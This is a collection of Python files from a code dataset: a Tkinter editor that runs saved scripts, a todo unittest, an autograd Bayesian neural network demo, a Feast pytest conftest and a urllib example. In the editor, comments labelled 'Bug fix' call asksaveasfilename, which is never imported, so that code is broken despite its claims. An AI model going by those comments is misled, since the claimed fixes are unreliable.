        if left < right:
            step = 1
        elif left > right:
            step = -1
        else:
            # Flat pair: direction unchanged.
            continue
        if step != prev_step:
            prev_step = step
            runs += 1
    return runs
def main():
    # Demo input: strictly alternating, so every adjacent pair flips
    # direction and the run count equals the length.
    sample = [1, 2, 1, 2, 1, 2, 1, 2]
    print(solution(sample))
# Standard script-entry guard (redundant parentheses removed).
if __name__ == "__main__":
    main()
| [
"[email protected]"
]
| |
47cb81c305f5950abd06d4b86fb817c6ec52f5fa | 1d9ad7aa473191dad19a64b8a72a4677db221e93 | /main.py | 62666cef8f1456cdbb69389b0e988ba4da7db633 | []
| no_license | ethicalhacker7217/PyStudio | 1884329209ec487f95300ee30521a51761d5bc3c | 176756fa396d3156803b400ffac2c5ac658a27cc | refs/heads/main | 2023-04-25T07:00:09.446229 | 2021-05-15T05:20:09 | 2021-05-15T05:20:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,752 | py | from tkinter import *
from tkinter.filedialog import asksaveasfile,askopenfilename
import subprocess
# Root window of the editor UI.
compiler = Tk()
compiler.title('PyStudio')
# Path of the file currently being edited ('' until first save/open).
File_path = ''
def set_file_path(path):
    """Remember *path* as the file backing the editor buffer."""
    # Bug fix: the original read ``global File_path()``, which is a
    # SyntaxError — the global statement takes a bare name, not a call.
    global File_path
    File_path = path
def run():
    """Execute the currently saved file and show stdout/stderr in the
    output pane; prompt the user to save first if no path is set."""
    if File_path == '':
        save_prompt = Toplevel()
        text = Label(save_prompt, text='Please save your code')
        text.pack()
        # Bug fix: the original fell through and ran an empty path anyway.
        return
    # Bug fix: the f-string was 'python{File_path}' (no space), producing a
    # bogus command such as 'pythonfoo.py'.
    command = f'python {File_path}'
    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    output, error = process.communicate()
    code_output.insert('1.0', output)
    code_output.insert('1.0', error)
def Save_as():
    """Write the editor buffer to File_path, asking for a path if unset."""
    if File_path == '':
        # Bug fix: ``asksaveasfile`` returns an open *file object*, not a
        # path string, and ``filetypes`` must be (label, pattern) tuples.
        path = asksaveasfilename(defaultextension='.py',
                                 filetypes=[('Python Files', '*.py')])
        if not path:
            # User cancelled the dialog.
            return
    else:
        path = File_path
    with open(path, 'w') as file:
        code = editor.get('1.0', END)
        file.write(code)
    set_file_path(path)
def Open():
    """Load a user-chosen file into the editor buffer."""
    # Bug fixes: ``filetypes`` takes (label, pattern) tuples, and the
    # original read the *editor* contents and discarded the file's text.
    path = askopenfilename(filetypes=[('Python Files', '*.py')])
    if not path:
        # User cancelled the dialog.
        return
    with open(path, 'r') as file:
        code = file.read()
    editor.delete('1.0', END)
    editor.insert('1.0', code)
    set_file_path(path)
# --- Menu bar -------------------------------------------------------------
menu_bar = Menu(compiler)
file_menu = Menu(menu_bar, tearoff=0)
file_menu.add_command(label='Open', command=Open)
file_menu.add_command(label='Save', command=Save_as)
file_menu.add_command(label='Save As', command=Save_as)
file_menu.add_command(label='Exit', command=exit)
menu_bar.add_cascade(label='File', menu=file_menu)
run_bar = Menu(menu_bar, tearoff=0)
run_bar.add_command(label='Run', command=run)
menu_bar.add_cascade(label='Run', menu=run_bar)
compiler.config(menu=menu_bar)
# --- Editor and output panes ----------------------------------------------
editor = Text()
editor.pack()
code_output = Text(height=7)
# Bug fix: the original ``code_output.pack`` lacked the call parentheses, so
# the output pane was never laid out.
code_output.pack()
compiler.mainloop()
| [
"[email protected]"
]
| |
3f37df8301b6e1dbb044c648cb837c0f03ffdbc6 | a1582cec6239f627c6740b391d751f429675ee39 | /test_todo.py | 039a3c22c18438751c553f7c5c877b02e940182e | []
| no_license | SolbiatiAlessandro/todos | 7cabfd35d6c7d3cdd3232051be4a96c667d55f21 | b85e74c4fc220dccc5a0a05a288465b2da98f6d0 | refs/heads/master | 2020-03-28T18:56:09.847298 | 2018-10-15T15:07:01 | 2018-10-15T15:07:01 | 148,928,531 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | import unittest
import todo
from os import path
dir_path = path.dirname(path.realpath(__file__))
class testTODO( unittest.TestCase ):
    """Smoke tests for the todo module.

    NOTE(review): these tests mutate the real ``todos`` file next to this
    script by appending a sentinel entry — confirm that is intended.
    """
    def test_readElems( self ):
        # readElems() should always return a (possibly empty) collection.
        self.assertIsNotNone( todo.readElems() )
    def test_todoDone( self ):
        # Append a sentinel entry, confirm it shows up first, then check
        # that todoDone() removes it from the front of the list.
        with open(dir_path+'/todos','a') as f:
            f.write('"[test elem]" 0')
        #import pdb;pdb.set_trace()
        elems = todo.readElems()
        self.assertEqual( "[test elem]", elems[0][1] )
        todo.todoDone()
        elems = todo.readElems()
        self.assertNotEqual( "[test elem]", elems[0][1] )
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
74c6e22e10d24f80e71b7232533ed388186eeff9 | 6ecbf084f558b37f0cee51c7226c1e116b5aa7bf | /scratch/bnn.py | aac4b4b2e7b7f9d26c1dc0798692c2967766ade1 | []
| no_license | reichlab/bayesian_non_parametric | 364b12ad07b09e9a4386572bd47c709ad7629497 | c8d7eb7493addb919b8f7159768dc732ce1a1f35 | refs/heads/master | 2021-01-01T06:43:10.176687 | 2018-03-25T14:33:32 | 2018-03-25T14:33:32 | 97,492,688 | 2 | 0 | null | 2018-01-02T15:23:21 | 2017-07-17T15:38:01 | Python | UTF-8 | Python | false | false | 8,338 | py | from __future__ import absolute_import
from __future__ import print_function
import matplotlib.pyplot as plt
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd import grad
from sklearn.preprocessing import scale
from autograd.optimizers import adam
def black_box_variational_inference(logprob, D, num_samples):
    """Implements http://arxiv.org/abs/1401.0118, and uses the
    local reparameterization trick from http://arxiv.org/abs/1506.02557

    ``logprob(samples, t)`` must return the unnormalized log-posterior for
    each sampled parameter vector.  Returns (objective, gradient,
    unpack_params), where ``objective(params, t)`` is the *negative* ELBO
    estimated with ``num_samples`` Monte-Carlo draws and ``params`` packs
    the mean and log-std of a D-dimensional diagonal Gaussian.
    """
    def unpack_params(params):
        # Variational dist is a diagonal Gaussian.
        # First D entries are the mean, remaining D the log standard devs.
        mean, log_std = params[:D], params[D:]
        return mean, log_std
    def gaussian_entropy(log_std):
        # Closed-form entropy of a diagonal Gaussian.
        return 0.5 * D * (1.0 + np.log(2*np.pi)) + np.sum(log_std)
    rs = npr.RandomState(0)
    def variational_objective(params, t):
        """Provides a stochastic estimate of the variational lower bound."""
        mean, log_std = unpack_params(params)
        # Reparameterization: eps ~ N(0, I), scaled/shifted by the params.
        samples = rs.randn(num_samples, D) * np.exp(log_std) + mean
        # ELBO = entropy(q) + E_q[log p], Monte-Carlo averaged.
        lower_bound = gaussian_entropy(log_std) + np.mean(logprob(samples, t))
        return -lower_bound
    gradient = grad(variational_objective)
    return variational_objective, gradient, unpack_params
def make_nn_funs(layer_sizes, L2_reg, noise_variance, nonlinearity=np.tanh):
    """These functions implement a standard multi-layer perceptron,
    vectorized over both training examples and weight samples.

    Returns (num_weights, predictions, logprob).
    """
    shapes = list(zip(layer_sizes[:-1], layer_sizes[1:]))
    # Each layer contributes an (m x n) weight matrix plus n biases.
    num_weights = sum((m+1)*n for m, n in shapes)
    def unpack_layers(weights):
        # weights: flat (num_weight_samples, num_weights) parameter matrix.
        num_weight_sets = len(weights)
        for m, n in shapes:
            # Yield (W, b) views for one layer, then advance the flat buffer.
            yield weights[:, :m*n] .reshape((num_weight_sets, m, n)),\
                  weights[:, m*n:m*n+n].reshape((num_weight_sets, 1, n))
            weights = weights[:, (m+1)*n:]
    def predictions(weights, inputs):
        """weights is shape (num_weight_samples x num_weights)
        inputs is shape (num_datapoints x D)"""
        inputs = np.expand_dims(inputs, 0)
        for W, b in unpack_layers(weights):
            # Batched affine transform: one matmul per weight sample.
            outputs = np.einsum('mnd,mdo->mno', inputs, W) + b
            inputs = nonlinearity(outputs)
        # The final layer's pre-activation is returned (no output nonlinearity).
        return outputs
    def logprob(weights, inputs, targets):
        # Gaussian prior on weights (L2 term) + Gaussian likelihood on targets.
        log_prior = -L2_reg * np.sum(weights**2, axis=1)
        preds = predictions(weights, inputs)
        log_lik = -np.sum((preds - targets)**2, axis=1)[:, 0] / noise_variance
        return log_prior + log_lik
    return num_weights, predictions, logprob
def build_toy_dataset(n_data=40, noise_std=0.1):
    """Two separated bands of noisy cosine samples, inputs rescaled to [-1, 1].

    Returns (inputs, targets), each shaped (2 * (n_data // 2), 1).
    """
    D = 1
    rs = npr.RandomState(0)
    # Bug fix for Python 3: ``n_data/2`` is a float there, but np.linspace
    # requires an integer ``num``.  Floor division preserves the Python 2
    # behaviour for even n_data (and now also tolerates odd n_data).
    half = n_data // 2
    inputs = np.concatenate([np.linspace(0, 2, num=half),
                             np.linspace(6, 8, num=half)])
    targets = np.cos(inputs) + rs.randn(len(inputs)) * noise_std
    inputs = (inputs - 4.0) / 4.0
    inputs = inputs.reshape((len(inputs), D))
    targets = targets.reshape((len(targets), D))
    return inputs, targets
if __name__ == '__main__':
    # Specify inference problem by its unnormalized log-posterior.
    rbf = lambda x: np.exp(-x**2)   # radial-basis nonlinearity (used below)
    relu = lambda x: np.maximum(x, 0.)  # alternative nonlinearity (unused)
    # Build a 1-20-20-1 MLP; returns parameter count plus prediction and
    # log-probability functions.
    num_weights, predictions, logprob = \
        make_nn_funs(layer_sizes=[1, 20, 20, 1], L2_reg=0.001,
                     noise_variance=0.01, nonlinearity=rbf)
    inputs, targets = build_toy_dataset()
data__full = [4,5,4,3,6,2,4,5,10,6,8,2,6,17,23,13,21,28,24,20,40,27,42,33,43,37,57,71,44,56,53,52,47,26,27,21,21,26,34,37,17,19,25,18,21,17,17,16,16,15,23,16,17,12,17,10,15,19,21,14,18,13,14,18,23,25,62,60,76,66,64,68,89,92,140,116,142,129,140,140,127,129,169,141,108,78,70,81,104,90,85,55,53,65,33,38,59,40,37,29,30,30,28,23,24,29,26,23,20,19,20,26,29,31,28,26,32,35,33,30,52,59,67,65,74,70,61,53,76,61,57,44,34,47,60,60,53,36,31,30,32,28,33,33,35,22,13,13,21,17,11,8,8,6,6,7,12,17,10,10,18,19,12,22,12,21,18,16,16,22,17,25,23,12,25,28,27,18,23,23,29,38,36,43,46,31,25,40,31,38,30,22,31,26,35,36,39,25,31,37,33,25,24,18,23,13,18,14,17,22,13,24,31,34,31,31,38,49,42,49,55,80,84,72,89,115,179,202,272,302,395,426,461,381,333,353,410,364,359,288,221,149,112,154,91,72,56,46,37,26,17,17,20,11,7,16,14,16,5,2,6,5,4,3,4,16,8,7,10,14,7,9,11,23,17,19,24,17,28,40,33,31,33,29,30,36,48,40,28,36,19,34,23,17,17,23,14,20,13,23,20,16,16,23,14,15,4,5,5,11,11,7,4,6,5,2,4,2,4,6,6,4,6,11,16,9,12,13,27,21,19,17,24,27,30,29,25,35,33,30,29,31,29,22,27,24,26,29,22,33,24,30,20,17,24,28,18,13,9,14,11,11,19,10,8,8,9,3,7,14,4,9,14,7,9,3,3,14,12,10,21,26,47,42,31,34,33,52,56,70,112,70,47,48,49,66,56,61,67,64,68,49,50,56,75,63,62,41,50,34,31,38,30,32,26,30,36,35,46,48,44,51,59,71,102,128,127,150,191,256,329,263,220,204,181,99,54,80,102,127,73,68,64,55,67,84,85,67,73,89,68,59,56,77,75,47,50,42,28,37,37,27,12,15,22,8,15,17,10,9,11,20,13,11,16,11,7,17,14,13,15,30,25,40,44,25,21,48,56,60,45,55,32,46,61,42,37,43,34,40,25,16,17,17,16,23,18,18,9,7,7,4,3,2,8,3,1,1,2,3,3,2,0,0,2,2,0,6,3,6,2,3,2,4,5,2,9,2,4,8,6,3,11,14,15,20,9,20,28,38,30,30,23,16,22,28,14,17,20,17,10,13,20,9,18,9,8,19,11,4,6,6,8,13,8,8,5,16,12,11,18,10,22,14,16,18,27,38,35,41,51,65,55,54,62,64,56,65,71,75,71,72,47,27,35,25,19,37,38,34,26,19,18,22,16,18,6,12,6,6,3,7,6,1,3,2,2,1,10,3,3,1,1,2,6,3,3,5,4,7,6,5,7,6,4,4,7,9,5,5,10,6,13,6,5,5,9,3,6,11,7,7,15,9,6,6,6,7,10,8,7,12,3,2,7,5,5,7,7,7,7,10,13,10,14,11,20,25,17,18,25,21,31,32,26,35,28,37,41,34,30,
39,39,39,34,30,37,29,26,15,22,15,20,14,10,21,14,14,9,11,5,6,7,11,4,3,2,6,10,7,5,3,12,13,10,13,13,8,21,18,8,7,20,14,14,7,14,10,13,27,13,18,16,16,20,17,4,15,8,6,12,15,11,10,15,17,7,7,8,9,12,12,5,4,11,4,5,7,1,1,4,2,6,3,4,10,12,21,26,21,30,45,56,75,83,82,126,119,137,131,112,82,73,43,55,55,53,46,43,29,22,26,13,17,8,13,10,17,19,9,9,9,3,7,7,0,2,3,3,1,3,3,3,7,3,5,11,5,5,6,6,4,4,8,14,12,16,10,16,18,15,23,17,33,15,13,11,14,17,19,20,12,21,7,19,10,13,10,8,21,11,9,14,14,15,18,16,12,20,8,3,13,4,1,10,8,13,10,21,18,21,34,25,34,33,40,42,36,72,75,76,92,71,112,106,101,170,135,106,68,48,48,26,33,29,17,12,13,17,15,14,15,10,9,2,6,8,5,1,2,3,4,3,1,3,5,2,3,2,3,2,2,3,4,3,4,4,4,7,6,15,11,9,9,12,13,13,13,20,28,45,28,34,41,36,38,48,27,23,28,42,30,18,38,28,36,44,41,35,28,28,22,26,24,9,21,10,15]
#data__full = np.array(data__full)/np.max(data__full).tolist()
    from sklearn.cluster import KMeans  # NOTE(review): unused import
    # Standardize the series to zero mean / unit variance.
    data__full = scale(data__full)
    # Train on the first 50 observations only.
    data__ = data__full[:50]
    m = 1  # NOTE(review): unused
    train_target = []
    train_data = []
    test_data = []
    test_target = []
    # One-step autoregression: predict x[i] from x[i-1].
    for i in range(1,len(data__)):
        train_data.append(data__[i-1])
        train_target.append(data__[i])
    print (np.array(train_data).shape)
    # No held-out split here: the "test" arrays alias the training arrays.
    X_train = X_test = np.array(train_data,dtype=np.float32).reshape((-1,1))
    y_train = y_test = np.array(train_target,dtype=np.float32).reshape((-1))
    inputs = X_train
    targets = y_train
    # Unnormalized log-posterior over network weights given the data.
    log_posterior = lambda weights, t: logprob(weights, X_train, y_train)
    # Build variational objective.
    objective, gradient, unpack_params = \
        black_box_variational_inference(log_posterior, num_weights,
                                        num_samples=20)
    # Set up figure.
    fig = plt.figure(figsize=(12, 8), facecolor='white')
    ax = fig.add_subplot(111, frameon=False)
    plt.ion()
    plt.show(block=False)
    def callback(params, t, g):
        """Per-iteration hook for adam: log the ELBO and redraw the plot."""
        print("Iteration {} lower bound {}".format(t, -objective(params, t)))
        # Sample functions from posterior.
        rs = npr.RandomState(0)
        mean, log_std = unpack_params(params)
        #rs = npr.RandomState(0)
        # Draw 10 weight vectors from the variational posterior.
        sample_weights = rs.randn(10, num_weights) * np.exp(log_std) + mean
        # NOTE(review): plot_inputs is assigned twice and never used below —
        # the plots are drawn against the training inputs instead.
        plot_inputs = data__full[49:60]
        plot_inputs = np.linspace(0, 100, num=400)
        outputs = predictions(sample_weights, np.expand_dims(inputs.ravel(), 1))
        plt.cla()
        # Training data as blue crosses, sampled posterior functions as lines.
        ax.plot(inputs.ravel(), targets.ravel(), 'bx')
        ax.plot(inputs.ravel(), outputs[:, :, 0].T)
        ax.set_ylim([-2, 2])
        ax.set_xlim([-2, 2])
        plt.draw()
        plt.pause(1.0/60.0)
    # Plot data and functions.
    # Initialize variational parameters
    rs = npr.RandomState(0)
    # Random initial means; small initial stds (exp(-5)) for a tight start.
    init_mean = rs.randn(num_weights)
    init_log_std = -5 * np.ones(num_weights)
    init_var_params = np.concatenate([init_mean, init_log_std])
    print("Optimizing variational parameters...")
    # Run adam on the negative-ELBO gradient; callback redraws each step.
    variational_params = adam(gradient, init_var_params,
                              step_size=0.1, num_iters=1000, callback=callback)
"[email protected]"
]
| |
762b157f8689129dbb59a301f005e5c667ff34f1 | 9fe97e356baf38e92a46553a5eb21d6f0942ec14 | /cluster/sdk/tests/e2e/conftest.py | 534468ccc96285a9421e6e2bca799c442ed25e02 | [
"LicenseRef-scancode-generic-cla",
"MIT"
]
| permissive | ezwiefel/feast-azure | 1adbd9c3a12577c42164e7536d4afed6096a8e3c | ae94e7232439559205d5e1e84217d8274e3d2f3b | refs/heads/main | 2023-08-27T00:43:26.233519 | 2021-11-04T10:53:01 | 2021-11-04T10:53:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,696 | py | import os
import pytest
def pytest_addoption(parser):
    """Register the command-line options used by the e2e test suite."""
    # Feast service endpoints.
    parser.addoption("--core-url", action="store", default="localhost:6565")
    parser.addoption("--serving-url", action="store", default="localhost:6566")
    parser.addoption("--job-service-url", action="store", default="localhost:6568")
    parser.addoption("--kafka-brokers", action="store", default="localhost:9092")
    # Target execution environment.
    parser.addoption(
        "--env", action="store", help="local|aws|gcloud|k8s|synapse", default="local"
    )
    parser.addoption("--with-job-service", action="store_true")
    parser.addoption("--staging-path", action="store")
    # Dataproc / EMR cluster selection and sizing.
    parser.addoption("--dataproc-cluster-name", action="store")
    parser.addoption("--dataproc-region", action="store")
    parser.addoption("--emr-cluster-id", action="store")
    parser.addoption("--emr-region", action="store")
    parser.addoption("--dataproc-project", action="store")
    parser.addoption("--dataproc-executor-instances", action="store", default="2")
    parser.addoption("--dataproc-executor-cores", action="store", default="2")
    parser.addoption("--dataproc-executor-memory", action="store", default="2g")
    parser.addoption("--k8s-namespace", action="store", default="sparkop-e2e")
    # Azure Synapse / Blob storage credentials and locations.
    parser.addoption("--azure-synapse-dev-url", action="store", default="")
    parser.addoption("--azure-synapse-pool-name", action="store", default="")
    parser.addoption("--azure-synapse-datalake-dir", action="store", default="")
    parser.addoption("--azure-blob-account-name", action="store", default="")
    parser.addoption("--azure-blob-account-access-key", action="store", default="")
    parser.addoption("--ingestion-jar", action="store")
    # Redis online store.
    parser.addoption("--redis-url", action="store", default="localhost:6379")
    parser.addoption("--redis-cluster", action="store_true")
    parser.addoption("--feast-version", action="store")
    parser.addoption("--bq-project", action="store")
    parser.addoption("--feast-project", action="store", default="default")
    # Metrics endpoints.
    parser.addoption("--statsd-url", action="store", default="localhost:8125")
    parser.addoption("--prometheus-url", action="store", default="localhost:9102")
    parser.addoption("--enable-auth", action="store_true")
    parser.addoption(
        "--scheduled-streaming-job",
        action="store_true",
        help="When set tests won't manually start streaming jobs,"
        " instead jobservice's loop is responsible for that",
    )
def pytest_runtest_setup(item):
    """Skip tests whose @pytest.mark.env(...) doesn't match --env."""
    required_envs = [mark.args[0] for mark in item.iter_markers(name="env")]
    if required_envs and item.config.getoption("env") not in required_envs:
        pytest.skip(f"test requires env in {required_envs}")
from .fixtures.base import project_root, project_version # noqa
from .fixtures.client import ( # noqa
feast_client,
feast_spark_client,
global_staging_path,
ingestion_job_jar,
local_staging_path,
tfrecord_feast_client,
)
if not os.environ.get("DISABLE_SERVICE_FIXTURES"):
from .fixtures.services import ( # noqa
kafka_port,
kafka_server,
redis_server,
statsd_server,
zookeeper_server,
)
else:
from .fixtures.external_services import ( # type: ignore # noqa
kafka_server,
redis_server,
statsd_server,
)
if not os.environ.get("DISABLE_FEAST_SERVICE_FIXTURES"):
from .fixtures.feast_services import * # type: ignore # noqa
from .fixtures.services import postgres_server # noqa
else:
from .fixtures.external_services import ( # type: ignore # noqa
feast_core,
feast_serving,
feast_jobservice,
enable_auth,
)
from .fixtures.data import * # noqa
| [
"[email protected]"
]
| |
5fbc95af27e8f02dbba38eac2683c62ebb6d0c35 | 3a6ab03da2f7ec1069c80f23c2ed6e2108ecb0ff | /urllib_urlopen.py | a8567af89b4f9558c14308f49467b82ed5562da0 | []
| no_license | lyletzzzw/pyAPIExample | 01604c0bc0f3df2b20b229873d25493d191d3e99 | 3760789f5d485774d86c469aa221ca6d8c2dba2c | refs/heads/master | 2021-01-17T17:06:33.730266 | 2012-08-05T13:06:18 | 2012-08-05T13:06:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | #! /usr/bin/env python
#coding=utf-8
import urllib
'''
sock = urllib.urlopen('http://diveintopython.org')
html1 = sock.info()
html2 = sock.read()
sock.close()
print html1
print html2
'''
print '--------------------------------------------'
# Form-encode the query payload (Python 2 urllib API).
data=urllib.urlencode({'wd':'AAA'})
print data
# Passing a data argument switches urlopen from GET to POST.
sock = urllib.urlopen('http://www.baidu.com',data)
html = sock.read()
sock.close()
print html
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.